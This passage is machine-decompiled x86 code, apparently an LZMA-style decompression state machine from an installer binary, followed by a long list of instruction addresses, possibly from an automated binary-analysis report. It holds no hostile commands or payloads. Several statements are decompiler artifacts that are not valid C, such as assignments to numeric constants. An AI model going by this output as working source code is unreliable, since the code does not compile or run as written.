												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                    0x00000000
                    0x00406355
                    0x00406355
                    0x00406359
                    0x00406382
                    0x0040638c
                    0x0040635b
                    0x00406364
                    0x00406371
                    0x00406374
                    0x004066b8
                    0x004066b8
                    0x004066bb
                    0x004066bb
                    0x004066bb
                    0x004066c1
                    0x004066c7
                    0x004066cd
                    0x004066e7
                    0x004066ea
                    0x004066f0
                    0x004066fb
                    0x004066fd
                    0x004066cf
                    0x004066cf
                    0x004066de
                    0x004066e2
                    0x004066e2
                    0x00406707
                    0x00000000
                    0x00000000
                    0x00406709
                    0x0040670d
                    0x004068bc
                    0x004068d2
                    0x004068da
                    0x004068e1
                    0x004068e3
                    0x004068ea
                    0x004068ee
                    0x004068ee
                    0x00406719
                    0x00406720
                    0x00406728
                    0x0040672b
                    0x0040672e
                    0x0040672e
                    0x00406734
                    0x00406734
                    0x00405ed0
                    0x00405ed0
                    0x00405ed0
                    0x00405ed9
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x00000000
                    0x00405eea
                    0x00000000
                    0x00000000
                    0x00405ef3
                    0x00405ef6
                    0x00405ef9
                    0x00405efd
                    0x00000000
                    0x00000000
                    0x00405f03
                    0x00405f06
                    0x00405f08
                    0x00405f09
                    0x00405f0c
                    0x00405f0e
                    0x00405f0f
                    0x00405f11
                    0x00405f14
                    0x00405f19
                    0x00405f1e
                    0x00405f27
                    0x00405f3a
                    0x00405f3d
                    0x00405f49
                    0x00405f71
                    0x00405f73
                    0x00405f81
                    0x00405f81
                    0x00405f85
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405f75
                    0x00405f75
                    0x00405f78
                    0x00405f79
                    0x00405f79
                    0x00000000
                    0x00405f75
                    0x00405f4f
                    0x00405f54
                    0x00405f54
                    0x00405f5d
                    0x00405f65
                    0x00405f68
                    0x00000000
                    0x00405f6e
                    0x00405f6e
                    0x00000000
                    0x00405f6e
                    0x00000000
                    0x00405f8b
                    0x00405f8b
                    0x00405f8f
                    0x0040683b
                    0x00000000
                    0x0040683b
                    0x00405f98
                    0x00405fa8
                    0x00405fab
                    0x00405fae
                    0x00405fae
                    0x00405fae
                    0x00405fb1
                    0x00405fb5
                    0x00000000
                    0x00000000
                    0x00405fb7
                    0x00405fbd
                    0x00405fe7
                    0x00405fed
                    0x00405ff4
                    0x00000000
                    0x00405ff4
                    0x00405fc3
                    0x00405fc6
                    0x00405fcb
                    0x00405fcb
                    0x00405fd6
                    0x00405fde
                    0x00405fe1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406026
                    0x0040602c
                    0x0040602f
                    0x0040603c
                    0x00406044
                    0x004066b8
                    0x00000000
                    0x00000000
                    0x00405ffb
                    0x00405ffb
                    0x00405fff
                    0x0040684a
                    0x00000000
                    0x0040684a
                    0x0040600b
                    0x00406016
                    0x00406016
                    0x00406016
                    0x00406019
                    0x0040601c
                    0x0040601f
                    0x00406024
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004066bb
                    0x004066bb
                    0x004066c1
                    0x004066c7
                    0x004066cd
                    0x004066e7
                    0x004066ea
                    0x004066f0
                    0x004066fb
                    0x004066fd
                    0x004066cf
                    0x004066cf
                    0x004066de
                    0x004066e2
                    0x004066e2
                    0x00406707
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040604c
                    0x0040604e
                    0x00406051
                    0x004060c2
                    0x004060c5
                    0x004060c8
                    0x004060cf
                    0x004060d9
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x004066b8
                    0x00406053
                    0x00406057
                    0x0040605a
                    0x0040605c
                    0x0040605f
                    0x00406062
                    0x00406064
                    0x00406067
                    0x00406069
                    0x0040606e
                    0x00406071
                    0x00406074
                    0x00406078
                    0x0040607f
                    0x00406082
                    0x00406089
                    0x0040608d
                    0x00406095
                    0x00406095
                    0x00406095
                    0x0040608f
                    0x0040608f
                    0x0040608f
                    0x00406084
                    0x00406084
                    0x00406084
                    0x00406099
                    0x0040609c
                    0x004060ba
                    0x004060bc
                    0x00000000
                    0x0040609e
                    0x0040609e
                    0x004060a1
                    0x004060a4
                    0x004060a7
                    0x004060a9
                    0x004060a9
                    0x004060a9
                    0x004060ac
                    0x004060af
                    0x004060b1
                    0x004060b2
                    0x004060b5
                    0x00000000
                    0x004060b5
                    0x00000000
                    0x004062eb
                    0x004062ef
                    0x0040630d
                    0x00406310
                    0x00406317
                    0x0040631a
                    0x0040631d
                    0x00406320
                    0x00406323
                    0x00406326
                    0x00406328
                    0x0040632f
                    0x00406330
                    0x00406332
                    0x00406335
                    0x00406338
                    0x0040633b
                    0x0040633b
                    0x00406340
                    0x00000000
                    0x00406340
                    0x004062f1
                    0x004062f4
                    0x004062f7
                    0x00406301
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406398
                    0x0040639c
                    0x00000000
                    0x00000000
                    0x004063a2
                    0x004063a6
                    0x00000000
                    0x00000000
                    0x004063ac
                    0x004063ae
                    0x004063b2
                    0x004063b2
                    0x004063b5
                    0x004063b9
                    0x00000000
                    0x00000000
                    0x00406409
                    0x0040640d
                    0x00406414
                    0x00406417
                    0x0040641a
                    0x00406424
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x004066b8
                    0x0040640f
                    0x00000000
                    0x00000000
                    0x00406430
                    0x00406434
                    0x0040643b
                    0x0040643e
                    0x00406441
                    0x00406436
                    0x00406436
                    0x00406436
                    0x00406444
                    0x00406447
                    0x0040644a
                    0x0040644a
                    0x0040644d
                    0x00406450
                    0x00406453
                    0x00406453
                    0x00406456
                    0x0040645d
                    0x00406462
                    0x00000000
                    0x00000000
                    0x004064f0
                    0x004064f0
                    0x004064f4
                    0x00406892
                    0x00000000
                    0x00406892
                    0x004064fa
                    0x004064fd
                    0x00406500
                    0x00406504
                    0x00406507
                    0x0040650d
                    0x0040650f
                    0x0040650f
                    0x0040650f
                    0x00406512
                    0x00406515
                    0x00000000
                    0x00000000
                    0x004060e5
                    0x004060e5
                    0x004060e9
                    0x00406856
                    0x00000000
                    0x00406856
                    0x004060ef
                    0x004060f2
                    0x004060f5
                    0x004060f9
                    0x004060fc
                    0x00406102
                    0x00406104
                    0x00406104
                    0x00406104
                    0x00406107
                    0x0040610a
                    0x0040610a
                    0x0040610d
                    0x00406110
                    0x00000000
                    0x00000000
                    0x00406116
                    0x0040611c
                    0x00000000
                    0x00000000
                    0x00406122
                    0x00406122
                    0x00406126
                    0x00406129
                    0x0040612c
                    0x0040612f
                    0x00406132
                    0x00406133
                    0x00406136
                    0x00406138
                    0x0040613e
                    0x00406141
                    0x00406144
                    0x00406147
                    0x0040614a
                    0x0040614d
                    0x00406150
                    0x0040616c
                    0x0040616f
                    0x00406172
                    0x00406175
                    0x0040617c
                    0x00406180
                    0x00406182
                    0x00406186
                    0x00406152
                    0x00406152
                    0x00406156
                    0x0040615e
                    0x00406163
                    0x00406165
                    0x00406167
                    0x00406167
                    0x00406189
                    0x00406190
                    0x00406193
                    0x00000000
                    0x00406199
                    0x00000000
                    0x00406199
                    0x00000000
                    0x0040619e
                    0x0040619e
                    0x004061a2
                    0x00406862
                    0x00000000
                    0x00406862
                    0x004061a8
                    0x004061ab
                    0x004061ae
                    0x004061b2
                    0x004061b5
                    0x004061bb
                    0x004061bd
                    0x004061bd
                    0x004061bd
                    0x004061c0
                    0x004061c3
                    0x004061c3
                    0x004061c3
                    0x004061c9
                    0x00000000
                    0x00000000
                    0x004061cb
                    0x004061ce
                    0x004061d1
                    0x004061d4
                    0x004061d7
                    0x004061da
                    0x004061dd
                    0x004061e0
                    0x004061e3
                    0x004061e6
                    0x004061e9
                    0x00406201
                    0x00406204
                    0x00406207
                    0x0040620a
                    0x0040620a
                    0x0040620d
                    0x00406211
                    0x00406213
                    0x004061eb
                    0x004061eb
                    0x004061f3
                    0x004061f8
                    0x004061fa
                    0x004061fc
                    0x004061fc
                    0x00406216
                    0x0040621d
                    0x00406220
                    0x00000000
                    0x00406222
                    0x00000000
                    0x00406222
                    0x00406220
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00000000
                    0x00000000
                    0x00406262
                    0x00406262
                    0x00406266
                    0x0040686e
                    0x00000000
                    0x0040686e
                    0x0040626c
                    0x0040626f
                    0x00406272
                    0x00406276
                    0x00406279
                    0x0040627f
                    0x00406281
                    0x00406281
                    0x00406281
                    0x00406284
                    0x00406287
                    0x00406287
                    0x0040628d
                    0x0040622b
                    0x0040622b
                    0x0040622e
                    0x00000000
                    0x0040622e
                    0x0040628f
                    0x0040628f
                    0x00406292
                    0x00406295
                    0x00406298
                    0x0040629b
                    0x0040629e
                    0x004062a1
                    0x004062a4
                    0x004062a7
                    0x004062aa
                    0x004062ad
                    0x004062c5
                    0x004062c8
                    0x004062cb
                    0x004062ce
                    0x004062ce
                    0x004062d1
                    0x004062d5
                    0x004062d7
                    0x004062af
                    0x004062af
                    0x004062b7
                    0x004062bc
                    0x004062be
                    0x004062c0
                    0x004062c0
                    0x004062da
                    0x004062e1
                    0x004062e4
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x00406573
                    0x00406573
                    0x00406577
                    0x0040689e
                    0x00000000
                    0x0040689e
                    0x0040657d
                    0x00406580
                    0x00406583
                    0x00406587
                    0x0040658a
                    0x00406590
                    0x00406592
                    0x00406592
                    0x00406592
                    0x00406595
                    0x00000000
                    0x00000000
                    0x00406343
                    0x00406343
                    0x00406346
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x00000000
                    0x00406682
                    0x00406686
                    0x004066a8
                    0x004066ab
                    0x004066b5
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x004066b8
                    0x00406688
                    0x0040668b
                    0x0040668f
                    0x00406692
                    0x00406692
                    0x00406695
                    0x00000000
                    0x00000000
                    0x0040673f
                    0x00406743
                    0x00406761
                    0x00406761
                    0x00406761
                    0x00406768
                    0x0040676f
                    0x00406776
                    0x00406776
                    0x00000000
                    0x00406776
                    0x00406745
                    0x00406748
                    0x0040674b
                    0x0040674e
                    0x00406755
                    0x00406699
                    0x00406699
                    0x0040669c
                    0x00000000
                    0x00000000
                    0x00406830
                    0x00406833
                    0x00406734
                    0x00000000
                    0x00000000
                    0x0040646a
                    0x0040646c
                    0x00406473
                    0x00406474
                    0x00406476
                    0x00406479
                    0x00000000
                    0x00000000
                    0x00406481
                    0x00406484
                    0x00406487
                    0x00406489
                    0x0040648b
                    0x0040648b
                    0x0040648c
                    0x0040648f
                    0x00406496
                    0x00406499
                    0x004064a7
                    0x00000000
                    0x00000000
                    0x0040677d
                    0x0040677d
                    0x00406780
                    0x00406787
                    0x00000000
                    0x00000000
                    0x0040678c
                    0x0040678c
                    0x00406790
                    0x004068c8
                    0x00000000
                    0x004068c8
                    0x00406796
                    0x00406799
                    0x0040679c
                    0x004067a0
                    0x004067a3
                    0x004067a9
                    0x004067ab
                    0x004067ab
                    0x004067ab
                    0x004067ae
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b4
                    0x004067b4
                    0x004067b8
                    0x00406818
                    0x0040681b
                    0x00406820
                    0x00406821
                    0x00406823
                    0x00406825
                    0x00406828
                    0x00406734
                    0x00406734
                    0x00000000
                    0x0040673a
                    0x00406734
                    0x004067ba
                    0x004067c0
                    0x004067c3
                    0x004067c6
                    0x004067c9
                    0x004067cc
                    0x004067cf
                    0x004067d2
                    0x004067d5
                    0x004067d8
                    0x004067db
                    0x004067f4
                    0x004067f7
                    0x004067fa
                    0x004067fd
                    0x00406801
                    0x00406803
                    0x00406803
                    0x00406804
                    0x00406807
                    0x004067dd
                    0x004067dd
                    0x004067e5
                    0x004067ea
                    0x004067ec
                    0x004067ef
                    0x004067ef
                    0x0040680a
                    0x00406811
                    0x00000000
                    0x00406813
                    0x00000000
                    0x00406813
                    0x00000000
                    0x004064af
                    0x004064b2
                    0x004064e8
                    0x00406618
                    0x00406618
                    0x00406618
                    0x00406618
                    0x0040661b
                    0x0040661b
                    0x0040661e
                    0x00406620
                    0x004068aa
                    0x00000000
                    0x004068aa
                    0x00406626
                    0x00406629
                    0x00000000
                    0x00000000
                    0x0040662f
                    0x00406633
                    0x00406636
                    0x00406636
                    0x00406636
                    0x00000000
                    0x00406636
                    0x004064b4
                    0x004064b6
                    0x004064b8
                    0x004064ba
                    0x004064bd
                    0x004064be
                    0x004064c0
                    0x004064c2
                    0x004064c5
                    0x004064c8
                    0x004064de
                    0x004064e3
                    0x0040651b
                    0x0040651b
                    0x0040651f
                    0x0040654b
                    0x0040654d
                    0x00406554
                    0x00406557
                    0x0040655a
                    0x0040655a
                    0x0040655f
                    0x0040655f
                    0x00406561
                    0x00406564
                    0x0040656b
                    0x0040656e
                    0x0040659b
                    0x0040659b
                    0x0040659e
                    0x004065a1
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00000000
                    0x00406615
                    0x004065a3
                    0x004065a9
                    0x004065ac
                    0x004065af
                    0x004065b2
                    0x004065b5
                    0x004065b8
                    0x004065bb
                    0x004065be
                    0x004065c1
                    0x004065c4
                    0x004065dd
                    0x004065df
                    0x004065e2
                    0x004065e3
                    0x004065e6
                    0x004065e8
                    0x004065eb
                    0x004065ed
                    0x004065ef
                    0x004065f2
                    0x004065f4
                    0x004065f7
                    0x004065fb
                    0x004065fd
                    0x004065fd
                    0x004065fe
                    0x00406601
                    0x00406604
                    0x004065c6
                    0x004065c6
                    0x004065ce
                    0x004065d3
                    0x004065d5
                    0x004065d8
                    0x004065d8
                    0x00406607
                    0x0040660e
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00000000
                    0x00406610
                    0x00000000
                    0x00406610
                    0x0040660e
                    0x00406521
                    0x00406524
                    0x00406526
                    0x00406529
                    0x0040652c
                    0x0040652f
                    0x00406531
                    0x00406534
                    0x00406537
                    0x00406537
                    0x0040653a
                    0x0040653a
                    0x0040653d
                    0x00406544
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00000000
                    0x00406546
                    0x00000000
                    0x00406546
                    0x00406544
                    0x004064ca
                    0x004064cd
                    0x004064cf
                    0x004064d2
                    0x00000000
                    0x00000000
                    0x00406231
                    0x00406231
                    0x00406235
                    0x0040687a
                    0x00000000
                    0x0040687a
                    0x0040623b
                    0x0040623e
                    0x00406241
                    0x00406244
                    0x00406247
                    0x0040624a
                    0x0040624d
                    0x0040624f
                    0x00406252
                    0x00406255
                    0x00406258
                    0x0040625a
                    0x0040625a
                    0x0040625a
                    0x00000000
                    0x00000000
                    0x004063bc
                    0x004063bc
                    0x004063c0
                    0x00406886
                    0x00000000
                    0x00406886
                    0x004063c6
                    0x004063c9
                    0x004063cc
                    0x004063cf
                    0x004063d1
                    0x004063d1
                    0x004063d1
                    0x004063d4
                    0x004063d7
                    0x004063da
                    0x004063dd
                    0x004063e0
                    0x004063e3
                    0x004063e4
                    0x004063e6
                    0x004063e6
                    0x004063e6
                    0x004063e9
